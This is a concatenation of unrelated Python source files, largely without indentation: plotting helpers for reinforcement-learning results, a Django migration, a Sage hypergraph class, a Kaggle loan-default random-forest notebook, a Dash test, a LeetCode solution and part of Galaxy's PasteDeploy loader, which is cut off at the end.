colors = list(sb.color_palette(cfg['plotting']['palette']))
color_map = cfg['plotting']['color_map']
return colors, color_map
def plot_lens(ax, methods, lens, steps_per_ep, title, episodes=50_000,
log=False, logx=False, eval_steps=1):
colors, color_map = get_colors()
print('AVG pol length')
mv = 0
created_steps_leg = False
for method in methods:
if method != 'hq':
m, s = lens[method].mean(axis=0), lens[method].std(axis=0)
total_ones = np.ones(m.shape) * 100
# print("{:>4s}: {:>5.2f}".format(method, 1 - np.sum(total_ones - m) / np.sum(total_ones)))
print("{:>4s}: {:>5.2f}".format(method, np.mean(m)))
ax.step(np.arange(1, m.shape[0] + 1) * eval_steps, m, where='post',
c=colors[color_map[method]])
ax.fill_between(
np.arange(1, m.shape[0] + 1) * eval_steps, m - s, m + s, alpha=0.25, step='post',
color=colors[color_map[method]])
if 'hq' not in methods:
mv = max(mv, max(m) + max(m) * .05)
else:
raise NotImplementedError
if steps_per_ep:
m, s = steps_per_ep[method].mean(axis=0), steps_per_ep[method].std(axis=0)
ax.step(np.arange(1, m.shape[0] + 1) * eval_steps, m, where='post',
c=np.array(colors[color_map[method]]) * .75, ls=':')
ax.fill_between(
np.arange(1, m.shape[0] + 1) * eval_steps, m - s, m + s, alpha=0.125, step='post',
color=np.array(colors[color_map[method]]) * .75)
mv = max(mv, max(m))
if not created_steps_leg:
ax.plot([-999, -999], [-999, -999], ls=':', c='k', label='all')
ax.plot([-999, -999], [-999, -999], ls='-', c='k', label='dec')
created_steps_leg = True
if log:
ax.set_ylim([1, max(mv, 100)])
ax.semilogy()
else:
ax.set_ylim([0, mv])
if logx:
ax.set_ylim([1, max(mv, 100)])
ax.set_xlim([1, episodes * eval_steps])
ax.semilogx()
else:
ax.set_xlim([0, episodes * eval_steps])
ax.set_ylabel('#Steps')
if steps_per_ep:
ax.legend(loc='upper right', ncol=1, handlelength=.75)
ax.set_ylabel('#Steps')
ax.set_xlabel('#Episodes')
ax.set_title(title)
return ax
def _annotate(ax, rewards, max_reward, eval_steps):
qxy = ((np.where(rewards['q'].mean(axis=0) >= .5 * max_reward)[0])[0] * eval_steps, .5)
sqvxy = ((np.where(rewards['sq'].mean(axis=0) >= .5 * max_reward)[0])[0] * eval_steps, .5)
ax.annotate("", # '{:d}x speedup'.format(int(np.round(qxy[0]/sqvxy[0]))),
xy=qxy,
xycoords='data', xytext=sqvxy, textcoords='data',
arrowprops=dict(arrowstyle="<->", color="0.",
connectionstyle="arc3,rad=0.", lw=5,
), )
speedup = qxy[0] / sqvxy[0]
qxy = (qxy[0], .5 * max_reward)
sqvxy = (sqvxy[0], .25)
ax.annotate(r'${:.2f}\times$ speedup'.format(speedup),
xy=qxy,
xycoords='data', xytext=sqvxy, textcoords='data',
arrowprops=dict(arrowstyle="-", color="0.",
connectionstyle="arc3,rad=0.", lw=0
),
fontsize=22)
try:
qxy = ((np.where(rewards['q'].mean(axis=0) >= max_reward)[0])[0] * eval_steps, max_reward)
sqvxy = ((np.where(rewards['sq'].mean(axis=0) >= max_reward)[0])[0] * eval_steps, max_reward)
ax.annotate("", # '{:d}x speedup'.format(int(np.round(qxy[0]/sqvxy[0]))),
xy=qxy,
xycoords='data', xytext=sqvxy, textcoords='data',
arrowprops=dict(arrowstyle="<->", color="0.",
connectionstyle="arc3,rad=0.", lw=5,
), )
speedup = qxy[0] / sqvxy[0]
qxy = (qxy[0], max_reward)
sqvxy = (sqvxy[0], .75)
ax.annotate(r'${:.2f}\times$ speedup'.format(speedup),
xy=qxy,
xycoords='data', xytext=sqvxy, textcoords='data',
arrowprops=dict(arrowstyle="-", color="0.",
connectionstyle="arc3,rad=0.", lw=0
),
fontsize=22)
except:
pass
def plot_rewards(ax, methods, rewards, title, episodes=50_000,
xlabel='#Episodes', log=False, logx=False, annotate=False, eval_steps=1):
colors, color_map = get_colors()
print('AUC')
min_m = np.inf
max_m = -np.inf
for method in methods:
m, s = rewards[method].mean(axis=0), rewards[method].std(axis=0)
# used for AUC computation
m_, s_ = ((rewards[method] + 1) / 2).mean(axis=0), ((rewards[method] + 1) / 2).std(axis=0)
min_m = min(min(m), min_m)
max_m = max(max(m), max_m)
total_ones = np.ones(m.shape)
label = method
if method == 'sqv3':
label = "sn-$\mathcal{Q}$"
elif method == 'sq':
label = "t-$\mathcal{Q}$"
label = label.replace('q', '$\mathcal{Q}$')
label = r'{:s}'.format(label)
print("{:>2s}: {:>5.2f}".format(method, 1 - np.sum(total_ones - m_) / np.sum(total_ones)))
ax.step(np.arange(1, m.shape[0] + 1) * eval_steps, m, where='post', c=colors[color_map[method]],
label=label)
ax.fill_between(np.arange(1, m.shape[0] + 1) * eval_steps, m - s, m + s, alpha=0.25, step='post',
color=colors[color_map[method]])
if annotate:
_annotate(ax, rewards, max_m, eval_steps)
if log:
ax.set_ylim([.01, max_m])
ax.semilogy()
else:
ax.set_ylim([min_m - .1, max_m + .1])
if logx:
ax.set_xlim([1, episodes * eval_steps])
ax.semilogx()
else:
ax.set_xlim([0, episodes * eval_steps])
ax.set_ylabel('Reward')
ax.set_xlabel(xlabel)
ax.set_title(title)
ax.legend(ncol=1, loc='lower right', handlelength=.75)
return ax
def plot(methods, rewards, lens, steps_per_ep, title, episodes=50_000,
show=True, savefig=None, logleny=True,
logrewy=True, logx=False, annotate=False, eval_steps=1, horizontal=False,
individual=False):
_, _ = get_colors()
if not individual:
if horizontal:
fig, ax = plt.subplots(1, 2, figsize=(32, 5), dpi=100)
else:
fig, ax = plt.subplots(2, figsize=(20, 10), dpi=100)
ax[0] = plot_rewards(ax[0], methods, rewards, title, episodes,
xlabel='#Episodes' if horizontal else '',
log=logrewy, logx=logx, annotate=annotate, eval_steps=eval_steps)
print()
ax[1] = plot_lens(ax[1], methods, lens, steps_per_ep, '', episodes, log=logleny,
logx=logx, eval_steps=eval_steps)
if savefig:
plt.savefig(savefig, dpi=100)
if show:
plt.show()
else:
try:
name, suffix = savefig.split('.')
except:
name = savefig
            suffix = 'pdf'
fig, ax = plt.subplots(1, figsize=(10, 4), dpi=100)
ax = plot_rewards(ax, methods, rewards, '', episodes,
xlabel='#Episodes',
log=logrewy, logx=logx, annotate=annotate, eval_steps=eval_steps)
plt.tight_layout()
if savefig:
plt.savefig(name + '_rewards' + '.' + suffix, dpi=100)
if show:
plt.show()
fig, ax = plt.subplots(1, figsize=(10, 4), dpi=100)
ax = plot_lens(ax, methods, lens, steps_per_ep, '', episodes, log=logleny,
logx=logx, eval_steps=eval_steps)
plt.tight_layout()
if savefig:
plt.savefig(name + '_lens' + '.' + suffix, dpi=100)
if show:
plt.show()
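# A minimal usage sketch (assumptions: 'q' and 'sq' are method keys registered in
# get_colors()'s color_map; the arrays below are synthetic stand-ins, not data from
# the original experiments), kept commented out so the module stays import-only:
#
#     import numpy as np
#     rng = np.random.default_rng(0)
#     rewards = {m: np.clip(np.cumsum(rng.random((5, 200)), axis=1) / 200, 0, 1)
#                for m in ('q', 'sq')}
#     lens = {m: np.maximum(1, 100 - np.arange(200))[None, :].repeat(5, axis=0)
#             for m in ('q', 'sq')}
#     plot(['q', 'sq'], rewards, lens, steps_per_ep=True, title='toy run',
#          episodes=200, eval_steps=1, savefig=None)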
|
python
|
# -*- coding: utf-8 -*-
"""
Created on 2021/1/12 16:51
@author: Irvinfaith
@email: [email protected]
"""
|
python
|
# Generated by Django 3.1.4 on 2020-12-12 22:01
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("peeringdb", "0014_auto_20201208_1856"),
("peering", "0065_auto_20201025_2137"),
]
operations = [
migrations.RemoveField(
model_name="autonomoussystem",
name="potential_internet_exchange_peering_sessions",
),
migrations.RemoveField(
model_name="internetexchange",
name="peeringdb_id",
),
migrations.AddField(
model_name="internetexchange",
name="peeringdb_ix",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="peeringdb.internetexchange",
),
),
migrations.AddField(
model_name="internetexchange",
name="peeringdb_netixlan",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="peeringdb.networkixlan",
),
),
]
|
python
|
r"""
Hypergraphs
This module consists of a very basic implementation of :class:`Hypergraph`,
whose only current purpose is to provide a method to visualize them. This is
done at the moment through `\LaTeX` and TikZ, and can be obtained from Sage
through the ``view`` command::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
sage: view(H) # not tested
Note that hypergraphs are very hard to visualize, and unless the hypergraph is very small
(`\leq 10` sets) or has a very specific structure (like the following one),
Sage's drawing will only bring more confusion::
sage: g = graphs.Grid2dGraph(5,5)
sage: sets = Set(map(Set,list(g.subgraph_search_iterator(graphs.CycleGraph(4)))))
sage: H = Hypergraph(sets)
sage: view(H) # not tested
.. SEEALSO::
:class:`Hypergraph` for information on the `\LaTeX` output
Classes and methods
-------------------
"""
from sage.misc.latex import latex
from sage.sets.set import Set
class Hypergraph:
r"""
A hypergraph.
A *hypergraph* `H = (V, E)` is a set of vertices `V` and a collection `E` of
sets of vertices called *hyperedges* or edges. In particular `E \subseteq
\mathcal{P}(V)`. If all (hyper)edges contain exactly 2 vertices, then `H` is
a graph in the usual sense.
.. rubric:: Latex output
    The `\LaTeX` output for a hypergraph `H` consists of the vertex set and a
    set of closed curves. The set of vertices in each closed curve represents a
hyperedge of `H`. A vertex which is encircled by a curve but is not
located on its boundary is **NOT** included in the corresponding set.
The colors are picked for readability and have no other meaning.
INPUT:
- ``sets`` -- A list of hyperedges
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{6}]); H
Hypergraph on 6 vertices containing 4 sets
REFERENCES:
- :wikipedia:`Hypergraph`
"""
def __init__(self, sets):
r"""
Constructor
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
"""
from sage.sets.set import Set
        self._sets = list(map(Set, sets))
self._domain = set([])
for s in sets:
for i in s:
self._domain.add(i)
def __repr__(self):
r"""
Short description of ``self``.
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
"""
return ("Hypergraph on "+str(len(self.domain()))+" "
"vertices containing "+str(len(self._sets))+" sets")
def edge_coloring(self):
r"""
Compute a proper edge-coloring.
A proper edge-coloring is an assignment of colors to the sets of the
hypergraph such that two sets with non-empty intersection receive
different colors. The coloring returned minimizes the number of colors.
OUTPUT:
A partition of the sets into color classes.
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
sage: C = H.edge_coloring()
sage: C # random
[[{3, 4, 5}], [{4, 5, 6}, {1, 2, 3}], [{2, 3, 4}]]
sage: Set(sum(C,[])) == Set(H._sets)
True
"""
from sage.graphs.graph import Graph
g = Graph([self._sets,lambda x,y : len(x&y)],loops = False)
return g.coloring(algorithm="MILP")
def _spring_layout(self):
r"""
Return a spring layout for the vertices.
The layout is computed by creating a graph `G` on the vertices *and*
sets of the hypergraph. Each set is then made adjacent in `G` with all
vertices it contains before a spring layout is computed for this
graph. The position of the vertices in the hypergraph is the position of
the same vertices in the graph's layout.
.. NOTE::
This method also returns the position of the "fake" vertices,
i.e. those representing the sets.
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
sage: L = H._spring_layout()
sage: L # random
{1: (0.238, -0.926),
2: (0.672, -0.518),
3: (0.449, -0.225),
4: (0.782, 0.225),
5: (0.558, 0.518),
6: (0.992, 0.926),
{3, 4, 5}: (0.504, 0.173),
{2, 3, 4}: (0.727, -0.173),
{4, 5, 6}: (0.838, 0.617),
{1, 2, 3}: (0.393, -0.617)}
sage: all(v in L for v in H.domain())
True
sage: all(v in L for v in H._sets)
True
"""
from sage.graphs.graph import Graph
g = Graph()
for s in self._sets:
for x in s:
g.add_edge(s,x)
_ = g.plot(iterations = 50000,save_pos=True)
# The values are rounded as TikZ does not like accuracy.
return {k:(round(x,3),round(y,3)) for k,(x,y) in g.get_pos().items()}
def domain(self):
r"""
Return the set of vertices.
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
sage: H.domain()
set([1, 2, 3, 4, 5, 6])
"""
return self._domain.copy()
def _latex_(self):
r"""
Return a TikZ representation of the hypergraph.
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
sage: view(H) # not tested
With sets of size 4::
sage: g = graphs.Grid2dGraph(5,5)
sage: C4 = graphs.CycleGraph(4)
sage: sets = Set(map(Set,list(g.subgraph_search_iterator(C4))))
sage: H = Hypergraph(sets)
sage: view(H) # not tested
"""
from sage.rings.integer import Integer
from sage.functions.trig import arctan2
from sage.misc.misc import warn
warn("\nThe hypergraph is drawn as a set of closed curves. The curve "
"representing a set S go **THROUGH** the vertices contained "
"in S.\n A vertex which is encircled by a curve but is not located "
"on its boundary is **NOT** included in the corresponding set.\n"
"\n"
"The colors are picked for readability and have no other meaning.")
latex.add_package_to_preamble_if_available("tikz")
if not latex.has_file("tikz.sty"):
raise RuntimeError("You must have TikZ installed in order "
"to draw a hypergraph.")
domain = self.domain()
pos = self._spring_layout()
tex = "\\begin{tikzpicture}[scale=3]\n"
colors = ["black", "red", "green", "blue", "cyan", "magenta", "yellow","pink","brown"]
colored_sets = [(s,i) for i,S in enumerate(self.edge_coloring()) for s in S]
# Prints each set with its color
for s,i in colored_sets:
current_color = colors[i%len(colors)]
if len(s) == 2:
s = list(s)
tex += ("\\draw[color="+str(current_color)+","+
"line width=.1cm,opacity = .6] "+
str(pos[s[0]])+" -- "+str(pos[s[1]])+";\n")
continue
tex += ("\\draw[color="+str(current_color)+","
"line width=.1cm,opacity = .6,"
"line cap=round,"
"line join=round]"
"plot [smooth cycle,tension=1] coordinates {")
# Reorders the vertices of s according to their angle with the
# "center", i.e. the vertex representing the set s
cx,cy = pos[s]
            s = [pos[x] for x in s]
            s = sorted(s, key=lambda p: arctan2(p[0] - cx, p[1] - cy))
for x in s:
tex += str(x)+" "
tex += "};\n"
# Prints each vertex
for v in domain:
tex += "\\draw node[fill,circle,scale=.5,label={90:$"+latex(v)+"$}] at "+str(pos[v])+" {};\n"
tex += "\\end{tikzpicture}"
return tex
|
python
|
# coding: utf-8
# **In this simple kernel, I will attempt to predict whether customers will be "Charged Off" on a loan using a Random Forest classifier.**
# In[ ]:
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import matplotlib.pyplot as plt
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
from subprocess import check_output
#print(check_output(["ls", "../input"]).decode("utf8"))
# Any results you write to the current directory are saved as output.
# In[ ]:
loan = pd.read_csv("../input/loan.csv")
print(loan.head())
# First let's see how many NaNs there are per column
# In[ ]:
#determine nan percentage
check_null = loan.isnull().sum().sort_values(ascending=False)/len(loan)
#print all columns with more than 20% NaNs
print(check_null[check_null > 0.2])
# In[ ]:
#loads of columns ... so let's remove these
loan.drop(check_null[check_null > 0.2].index, axis=1, inplace=True)
loan.dropna(axis=0, thresh=30,inplace=True)
# After culling the NaN-dominated columns, there are still a lot of features. Some will have useful info, others not. At this point I carefully weeded out any column that I think may well be useless. My main criterion is whether a feature is dominated by a single value (> 80%):
# 1. id and member_id: somehow I don't think these will be useful, considering all values were unique
# 2. policy_code: this is the same for all customers
# 3. url: this is the webpage of the loan data. May come in handy at some other stage (maybe)
# 4. zip_code and addr_state: I really don't think that the state and location of a person will determine if they will repay a loan. Although, I could be wrong ....
# 5. application_type: was >99% INDIVIDUAL
# 6. 'pymnt_plan': 99.99% N
# 7. emp_title: this could be useful. Possibly through NLP.
# 8. acc_now_delinq: > 99% 0
# 9. title: may be very useful. Requires NLP
# 10. collections_12_mths_ex_med: ~98% 0
# 11. collection_recovery_fee: > 98% 0
# In[ ]:
#first let's remove some columns
del_cols = ['id', 'member_id', 'policy_code', 'url', 'zip_code', 'addr_state',
'pymnt_plan','emp_title','application_type','acc_now_delinq','title',
'collections_12_mths_ex_med','collection_recovery_fee']
# In[ ]:
loan = loan.drop(del_cols,axis=1)
# The point of this exercise is to predict if a loan will be "Charged Off". Let's see the breakdown of the target column: 'loan_status'
# In[ ]:
print(loan['loan_status'].value_counts()/len(loan))
# Yikes! Ok, for now we will ignore "Current" customers. Note that we could use the generated model to predict whether a "Current" customer will be "Charged Off".
# In[ ]:
loan = loan[loan['loan_status'] != 'Current']
# In[ ]:
print(loan['loan_status'].value_counts()/len(loan))
# The column 'emp_length' may be useful
# In[ ]:
print(loan['emp_length'].unique())
# Let's convert this to categorical data
# In[ ]:
loan['empl_exp'] = 'experienced'
loan.loc[loan['emp_length'] == '< 1 year', 'empl_exp'] = 'inexp'
loan.loc[loan['emp_length'] == '1 year', 'empl_exp'] = 'new'
loan.loc[loan['emp_length'] == '2 years', 'empl_exp'] = 'new'
loan.loc[loan['emp_length'] == '3 years', 'empl_exp'] = 'new'
loan.loc[loan['emp_length'] == '4 years', 'empl_exp'] = 'intermed'
loan.loc[loan['emp_length'] == '5 years', 'empl_exp'] = 'intermed'
loan.loc[loan['emp_length'] == '6 years', 'empl_exp'] = 'intermed'
loan.loc[loan['emp_length'] == '7 years', 'empl_exp'] = 'seasoned'
loan.loc[loan['emp_length'] == '8 years', 'empl_exp'] = 'seasoned'
loan.loc[loan['emp_length'] == '9 years', 'empl_exp'] = 'seasoned'
loan.loc[loan['emp_length'] == 'n/a', 'empl_exp'] = 'unknown'
#delete the emp_length column
loan = loan.drop('emp_length',axis=1)
# In[ ]:
#remove all rows with nans
loan.dropna(axis=0, how = 'any', inplace = True)
# In[ ]:
print(loan['loan_status'].value_counts()/len(loan))
# In[ ]:
#extract the target column and convert to Charged Off to 1 and the rest as 0
mask = (loan.loan_status == 'Charged Off')
loan['target'] = 0
loan.loc[mask,'target'] = 1
target = loan['target']
loan = loan.drop(['loan_status','target'],axis=1)
# In[ ]:
target.value_counts()
# The next step is to convert all categorical data to dummy numerical data. First let's separate the categorical from the numeric columns
# In[ ]:
loan_categorical = loan.select_dtypes(include=['object'], exclude=['float64','int64'])
features = loan.select_dtypes(include=['float64','int64'])
# In[ ]:
#one-hot-encode the categorical variables and combine with the numerical values
for col in list(loan_categorical):
dummy = pd.get_dummies(loan_categorical[col])
features = pd.concat([features,dummy],axis=1)
# In[ ]:
#time to split and build models
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(features,target)
# The model we will build is Random Forest
# In[ ]:
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_recall_curve,average_precision_score
from sklearn.metrics import confusion_matrix, classification_report
# In[ ]:
RF = RandomForestClassifier(n_estimators=500)
RF.fit(X_train, y_train)
y_pred = RF.predict(X_test)
print('Test score: {:.2f}'.format(RF.score(X_test, y_test)))
print("Confusion matrix:\n%s" % confusion_matrix(y_test, y_pred))
print("Classification report for Random Forest classifier %s:\n%s\n"
% (RF, classification_report(y_test, y_pred)))
# Nice! Carefully selecting features as well as some feature engineering paid off! 100% precision and 98% recall for all "Charged Off" loans! Since the dataset is skewed, let's have a look at the precision-recall curve
# In[ ]:
precision, recall, thresholds = precision_recall_curve(y_test,RF.predict_proba(X_test)[:, 1])
AUC = average_precision_score(y_test, RF.predict_proba(X_test)[:, 1])
plt.plot(precision, recall, label='AUC: {:.2f} for {} Trees'.format(AUC, 500))
close_default_rf = np.argmin(np.abs(thresholds - 0.5))
plt.plot(precision[close_default_rf], recall[close_default_rf], 'o', c='k',
markersize=10, fillstyle="none", mew=2)
plt.ylabel('Recall')
plt.xlabel('Precision')
plt.title('Precision-Recall Curve Random Forest')
plt.legend(loc='best')
plt.show()
# Next steps: we can use this model to determine the probability that any of the "Current" customers will be "Charged Off".
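# In[ ]:
# Hedged sketch of that follow-up (not run in the original kernel): the "Current" rows were
# filtered out of `loan` above, so one would reload them, apply the *same* preprocessing
# (column drops, empl_exp mapping, dropna, one-hot encoding), align the resulting columns
# with `features`, and then score them. The names below are illustrative only:
#
# current = pd.read_csv("../input/loan.csv")
# current = current[current['loan_status'] == 'Current']
# ... repeat the feature-engineering steps above to build `current_features` ...
# current_features = current_features.reindex(columns=features.columns, fill_value=0)
# charged_off_prob = RF.predict_proba(current_features)[:, 1]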
|
python
|
from rater import generate_pokemon_list_summary
from common import pokemon_base_stats
from pokedex import pokedex
excluded_pokemon_name_list = []
def find_bad_pokemons(pokemon_list):
pokemon_summary = generate_pokemon_list_summary(pokemon_list)
bad_pokemons_ids = []
for pokemon_name in sorted(pokemon_summary.keys()):
if pokemon_name in excluded_pokemon_name_list:
continue
if len(pokemon_summary[pokemon_name]) == 0:
continue
if pokedex.evolves[pokemon_summary[pokemon_name][0]['pokemon_info']['pokemon_id']] == 0:
# print "skipping", pokemon_name
continue
best_cp_pokemons = sorted(pokemon_summary[pokemon_name], key=lambda pokemon:pokemon['pokemon_info']['cp'], reverse=True)[:1]
best_score_pokemons = sorted(pokemon_summary[pokemon_name], key=lambda pokemon:pokemon['score'], reverse=True)[:2]
pokemons_to_keep = best_cp_pokemons + best_score_pokemons
pokemon_ids_to_keep = [pokemon['pokemon_info']['id'] for pokemon in pokemons_to_keep]
good_pokemons, bad_pokemons = [], []
for pokemon in pokemon_summary[pokemon_name]:
if pokemon['pokemon_info']['id'] not in pokemon_ids_to_keep and pokemon['score'] < 90:
bad_pokemons.append((pokemon['pokemon_info'], pokemon['score'], pokemon['power']))
bad_pokemons_ids.append(pokemon['pokemon_info']['id'])
else:
good_pokemons.append((pokemon['pokemon_info'], pokemon['score'], pokemon['power']))
# if len(good_pokemons) > 0:
# print "good", pokemon_name
# for (pokemon, score, cur_cp_wo_multi) in good_pokemons:
# print "cp:", pokemon['cp'], "score:", score, "power:", cur_cp_wo_multi
# if len(bad_pokemons) > 0:
# print "bad", pokemon_name
# for (pokemon, score, cur_cp_wo_multi) in bad_pokemons:
# print "cp:", pokemon['cp'], "score:", score, "power:", cur_cp_wo_multi, "id:", pokemon['id']
return bad_pokemons_ids
|
python
|
app = """
library(dash)
app <- Dash$new()
app$layout(
html$div(
list(
dccInput(id='input-1-state', type='text', value='Montreal'),
dccInput(id='input-2-state', type='text', value='Canada'),
html$button(id='submit-button', n_clicks=0, 'Submit'),
html$div(id='output-state'),
dccGraph(id='graph',
figure=list(
data=list(
list(
x=list(1, 2, 3),
y=list(4, 1, 2),
type='bar',
name='SF'
),
list(
x=list(1, 2, 3),
y=list(2, 4, 5),
type='bar',
name='Montreal'
)
),
layout = list(title='Dash Data Visualization')
)
)
)
)
)
app$callback(output(id = 'output-state', property = 'children'),
list(input(id = 'submit-button', property = 'n_clicks'),
state(id = 'input-1-state', property = 'value'),
state(id = 'input-2-state', property = 'value')),
function(n_clicks, input1, input2) {
sprintf('The Button has been pressed \\'%s\\' times, Input 1 is \\'%s\\', and Input 2 is \\'%s\\'', n_clicks, input1, input2) # noqa:E501
})
app$run_server()
"""
# pylint: disable=c0301
def test_rsdp001_dopsa(dashr):
dashr.start_server(app)
dashr.wait_for_text_to_equal(
"#output-state", "The Button has been pressed '0' times, Input 1 is 'Montreal', and Input 2 is 'Canada'", timeout=1 # noqa:E501
)
input1 = dashr.find_element("#input-2-state")
dashr.clear_input(input1)
input1.send_keys("Quebec")
dashr.wait_for_text_to_equal(
"#input-2-state", "Quebec", timeout=1
)
dashr.find_element("#submit-button").click()
dashr.wait_for_text_to_equal(
"#output-state", "The Button has been pressed '1' times, Input 1 is 'Montreal', and Input 2 is 'Quebec'", timeout=1 # noqa:E501
)
dashr.percy_snapshot("rsdp001 - dopsa")
|
python
|
class Solution:
def wordPattern(self, pattern, str):
map_letter_to_word = dict()
map_word_to_letter = dict()
words = str.split()
if len(words) != len(pattern):
return False
for letter, word in zip(pattern, words):
if letter in map_letter_to_word and map_letter_to_word[letter] != word:
return False
if word in map_word_to_letter and map_word_to_letter[word] != letter:
return False
map_letter_to_word[letter] = word
map_word_to_letter[word] = letter
return True
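# A small self-check (illustrative inputs, not part of the original solution):
# "abba" <-> "dog cat cat dog" is a consistent bijection, while the other two are not.
if __name__ == "__main__":
    solution = Solution()
    assert solution.wordPattern("abba", "dog cat cat dog") is True
    assert solution.wordPattern("abba", "dog cat cat fish") is False
    assert solution.wordPattern("abba", "dog dog dog dog") is False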
|
python
|
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# Mostly taken from PasteDeploy and stripped down for Galaxy
import inspect
import os
import re
import sys
import pkg_resources
from six import iteritems
from six.moves.urllib.parse import unquote
from galaxy.util.properties import NicerConfigParser
__all__ = ('loadapp', 'loadserver', 'loadfilter', 'appconfig')
# ---- from paste.deploy.compat --------------------------------------
"""Python 2<->3 compatibility module"""
def print_(template, *args, **kwargs):
template = str(template)
if args:
template = template % args
elif kwargs:
template = template % kwargs
sys.stdout.writelines(template)
if sys.version_info < (3, 0):
def reraise(t, e, tb):
exec('raise t, e, tb', dict(t=t, e=e, tb=tb))
else:
    def reraise(t, e, tb):
        raise e.with_traceback(tb)
# ---- from paste.deploy.util ----------------------------------------
def fix_type_error(exc_info, callable, varargs, kwargs):
"""
Given an exception, this will test if the exception was due to a
signature error, and annotate the error with better information if
so.
Usage::
try:
val = callable(*args, **kw)
except TypeError:
exc_info = fix_type_error(None, callable, args, kw)
            reraise(*exc_info)
"""
if exc_info is None:
exc_info = sys.exc_info()
if (exc_info[0] != TypeError or
str(exc_info[1]).find('arguments') == -1 or
getattr(exc_info[1], '_type_error_fixed', False)):
return exc_info
exc_info[1]._type_error_fixed = True
argspec = inspect.formatargspec(*inspect.getargspec(callable))
args = ', '.join(map(_short_repr, varargs))
if kwargs and args:
args += ', '
if kwargs:
kwargs = sorted(kwargs.keys())
args += ', '.join('%s=...' % n for n in kwargs)
gotspec = '(%s)' % args
msg = '%s; got %s, wanted %s' % (exc_info[1], gotspec, argspec)
exc_info[1].args = (msg,)
return exc_info
def _short_repr(v):
v = repr(v)
if len(v) > 12:
v = v[:8] + '...' + v[-4:]
return v
def fix_call(callable, *args, **kw):
"""
Call ``callable(*args, **kw)`` fixing any type errors that come out.
"""
try:
val = callable(*args, **kw)
except TypeError:
exc_info = fix_type_error(None, callable, args, kw)
reraise(*exc_info)
return val
def lookup_object(spec):
"""
Looks up a module or object from a some.module:func_name specification.
To just look up a module, omit the colon and everything after it.
"""
parts, target = spec.split(':') if ':' in spec else (spec, None)
module = __import__(parts)
for part in parts.split('.')[1:] + ([target] if target else []):
module = getattr(module, part)
return module
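# Illustrative behaviour (not part of the original module): lookup_object('os.path:join')
# returns the os.path.join function, while lookup_object('os.path') returns the module itself.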
# ---- from paste.deploy.loadwsgi ------------------------------------
############################################################
# Utility functions
############################################################
def import_string(s):
return pkg_resources.EntryPoint.parse("x=" + s).load(False)
def _aslist(obj):
"""
Turn object into a list; lists and tuples are left as-is, None
becomes [], and everything else turns into a one-element list.
"""
if obj is None:
return []
elif isinstance(obj, (list, tuple)):
return obj
else:
return [obj]
def _flatten(lst):
"""
Flatten a nested list.
"""
if not isinstance(lst, (list, tuple)):
return [lst]
result = []
for item in lst:
result.extend(_flatten(item))
return result
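# For example (illustrative): _aslist(None) == [], _aslist('x') == ['x'], and
# _flatten([['a', ['b']], 'c']) == ['a', 'b', 'c'].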
############################################################
# Object types
############################################################
class _ObjectType(object):
name = None
egg_protocols = None
config_prefixes = None
def __init__(self):
# Normalize these variables:
self.egg_protocols = [_aslist(p) for p in _aslist(self.egg_protocols)]
self.config_prefixes = [_aslist(p) for p in _aslist(self.config_prefixes)]
def __repr__(self):
return '<%s protocols=%r prefixes=%r>' % (
self.name, self.egg_protocols, self.config_prefixes)
def invoke(self, context):
assert context.protocol in _flatten(self.egg_protocols)
return fix_call(context.object,
context.global_conf, **context.local_conf)
class _App(_ObjectType):
name = 'application'
egg_protocols = ['paste.app_factory', 'paste.composite_factory',
'paste.composit_factory']
config_prefixes = [['app', 'application'], ['composite', 'composit'],
'pipeline', 'filter-app']
def invoke(self, context):
if context.protocol in ('paste.composit_factory',
'paste.composite_factory'):
return fix_call(context.object,
context.loader, context.global_conf,
**context.local_conf)
elif context.protocol == 'paste.app_factory':
return fix_call(context.object, context.global_conf, **context.local_conf)
else:
assert 0, "Protocol %r unknown" % context.protocol
APP = _App()
class _Filter(_ObjectType):
name = 'filter'
egg_protocols = [['paste.filter_factory', 'paste.filter_app_factory']]
config_prefixes = ['filter']
def invoke(self, context):
if context.protocol == 'paste.filter_factory':
return fix_call(context.object,
context.global_conf, **context.local_conf)
elif context.protocol == 'paste.filter_app_factory':
def filter_wrapper(wsgi_app):
# This should be an object, so it has a nicer __repr__
return fix_call(context.object,
wsgi_app, context.global_conf,
**context.local_conf)
return filter_wrapper
else:
assert 0, "Protocol %r unknown" % context.protocol
FILTER = _Filter()
class _Server(_ObjectType):
name = 'server'
egg_protocols = [['paste.server_factory', 'paste.server_runner']]
config_prefixes = ['server']
def invoke(self, context):
if context.protocol == 'paste.server_factory':
return fix_call(context.object,
context.global_conf, **context.local_conf)
elif context.protocol == 'paste.server_runner':
def server_wrapper(wsgi_app):
# This should be an object, so it has a nicer __repr__
return fix_call(context.object,
wsgi_app, context.global_conf,
